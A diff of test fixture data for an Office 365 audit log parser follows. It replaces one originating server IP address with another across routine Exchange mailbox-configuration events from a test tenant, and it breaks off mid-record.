"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6292,7 +6292,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -6366,7 +6366,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -6378,7 +6378,7 @@
 "Operation": "Enable-AddressListPaging",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DoNotUpdateRecipients",
@@ -6404,7 +6404,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6416,7 +6416,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -6490,7 +6490,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -6502,7 +6502,7 @@
 "Operation": "Install-ResourceConfig",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -6524,7 +6524,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -6536,7 +6536,7 @@
 "Operation": "Set-RecipientEnforcementProvisioningPolicy",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
@@ -6566,7 +6566,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6578,7 +6578,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "Force", 
@@ -6640,7 +6640,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -6652,7 +6652,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -6726,7 +6726,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", @@ -6738,7 +6738,7 @@ "Operation": "Set-RecipientEnforcementProvisioningPolicy", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "DomainController", 
@@ -6768,7 +6768,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 